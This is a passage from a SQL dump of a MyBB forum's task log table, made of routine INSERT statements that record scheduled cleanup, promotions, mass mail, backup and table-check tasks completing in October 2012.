(`lid`, `tid`, `dateline`, `data`) VALUES ('11302', '1', '1350630079', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11303', '7', '1350630154', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11304', '5', '1350630315', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11305', '9', '1350630643', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11306', '5', '1350631545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11307', '9', '1350631558', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11308', '3', '1350631899', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11309', '9', '1350633075', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11310', '5', '1350633322', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11311', '9', '1350633397', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11312', '3', '1350633654', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11313', '1', '1350633678', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11314', '7', '1350633719', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11315', '5', '1350634035', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11316', '9', '1350634329', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11317', '5', '1350635300', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11318', '9', '1350635314', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11319', '3', '1350636417', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11320', '9', '1350636440', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11321', '5', '1350636441', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11322', '9', '1350636929', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11323', '3', '1350637609', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11324', '1', '1350637790', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11325', '7', '1350637793', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11326', '5', '1350637794', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11327', '9', '1350637814', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11328', '5', '1350638997', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11329', '9', '1350639006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11330', '3', '1350639008', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11331', '9', '1350640389', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11332', '5', '1350640394', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11333', '9', '1350641246', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11334', '3', '1350641253', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11335', '1', '1350641262', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11336', '7', '1350641283', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11337', '5', '1350641304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11338', '9', '1350641450', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11339', '5', '1350643832', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11340', '9', '1350643843', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11341', '3', '1350643847', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11342', '9', '1350645400', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11343', '3', '1350645403', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11344', '1', '1350645469', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11345', '7', '1350645865', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11346', '5', '1350645971', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11347', '9', '1350646005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11348', '3', '1350646927', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11349', '9', '1350646984', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11350', '5', '1350647294', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11351', '9', '1350647735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11352', '3', '1350647948', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11353', '1', '1350648007', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11354', '4', '1350648009', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11355', '7', '1350648052', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11356', '5', '1350648301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11357', '9', '1350648911', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11358', '5', '1350649991', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11359', '9', '1350650003', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11360', '3', '1350650077', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11361', '9', '1350650413', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11362', '5', '1350650726', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11363', '9', '1350651553', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11364', '3', '1350651565', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11365', '1', '1350651633', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11366', '7', '1350651923', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11367', '5', '1350651927', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11368', '9', '1350652834', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11369', '5', '1350653141', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11370', '9', '1350653292', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11371', '3', '1350653561', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11372', '9', '1350654096', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11373', '5', '1350654380', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11374', '9', '1350654947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11375', '3', '1350655175', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11376', '1', '1350655398', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11377', '7', '1350655417', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11378', '5', '1350655733', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11379', '9', '1350657733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11380', '5', '1350657738', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11381', '3', '1350657758', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11382', '5', '1350658054', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11383', '9', '1350658784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11384', '3', '1350658803', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11385', '1', '1350658855', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11386', '7', '1350658908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11387', '5', '1350659203', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11388', '9', '1350659577', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11389', '5', '1350664041', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11390', '9', '1350664072', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11391', '3', '1350664082', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11392', '1', '1350664089', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11393', '7', '1350664096', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11394', '3', '1350664455', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11395', '9', '1350665188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11396', '5', '1350666281', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11397', '9', '1350667784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11398', '3', '1350667788', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11399', '1', '1350668125', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11400', '7', '1350668217', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11401', '5', '1350668222', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11402', '3', '1350668848', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11403', '9', '1350668962', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11404', '5', '1350668965', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11405', '9', '1350669658', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11406', '3', '1350669804', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11407', '1', '1350669938', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11408', '7', '1350669963', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11409', '5', '1350670406', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11410', '9', '1350670786', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11411', '5', '1350671131', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11412', '9', '1350671167', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11413', '3', '1350671572', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11414', '9', '1350672410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11415', '5', '1350672444', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11416', '9', '1350672952', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11417', '3', '1350673187', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11418', '1', '1350673212', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11419', '7', '1350673234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11420', '5', '1350673503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11421', '9', '1350673916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11422', '5', '1350674764', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11423', '9', '1350674774', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11424', '3', '1350675006', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11425', '9', '1350675669', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11426', '5', '1350675905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11427', '9', '1350676526', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11428', '3', '1350676835', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11429', '1', '1350676919', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11430', '7', '1350676926', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11431', '5', '1350677221', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11432', '9', '1350677419', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11433', '5', '1350678326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11434', '9', '1350678382', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11435', '3', '1350678601', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11436', '9', '1350679420', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11437', '5', '1350679566', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11438', '9', '1350680234', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11439', '3', '1350680370', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11440', '1', '1350680431', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11441', '7', '1350680440', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11442', '5', '1350680776', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11443', '9', '1350681002', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11444', '5', '1350681937', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11445', '9', '1350681948', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11446', '3', '1350682205', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11447', '9', '1350682823', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11448', '5', '1350683102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11449', '9', '1350683818', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11450', '3', '1350683943', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11451', '1', '1350684041', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11452', '7', '1350684125', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11453', '5', '1350684458', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11454', '9', '1350684623', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11455', '5', '1350685607', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11456', '9', '1350685739', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11457', '3', '1350685882', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11458', '9', '1350686615', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11459', '5', '1350686870', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11460', '9', '1350687312', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11461', '3', '1350687901', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11462', '1', '1350687904', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11463', '7', '1350687908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11464', '5', '1350687923', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11465', '9', '1350688402', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11466', '5', '1350689265', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11467', '9', '1350689303', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11468', '3', '1350689680', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11469', '9', '1350690067', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11470', '5', '1350690443', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11471', '9', '1350691668', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11472', '3', '1350691727', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11473', '1', '1350691733', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11474', '2', '1350691739', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11475', '7', '1350691743', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11476', '11', '1350691765', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11477', '5', '1350691769', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11478', '9', '1350691830', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11479', '5', '1350692701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11480', '9', '1350692769', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11481', '3', '1350693009', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11482', '9', '1350693616', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11483', '5', '1350693958', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11484', '9', '1350694682', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11485', '3', '1350694746', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11486', '1', '1350694802', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11487', '7', '1350694961', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11488', '5', '1350695179', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11489', '9', '1350695578', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11490', '5', '1350696621', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11491', '9', '1350696659', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11492', '3', '1350696664', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11493', '9', '1350697344', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11494', '5', '1350697503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11495', '9', '1350698139', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11496', '3', '1350698401', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11497', '1', '1350698413', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11498', '7', '1350698428', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11499', '5', '1350698822', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11500', '9', '1350699049', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11501', '5', '1350699904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11502', '9', '1350699916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11503', '3', '1350700313', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11504', '9', '1350700881', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11505', '5', '1350701182', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11506', '9', '1350701766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11507', 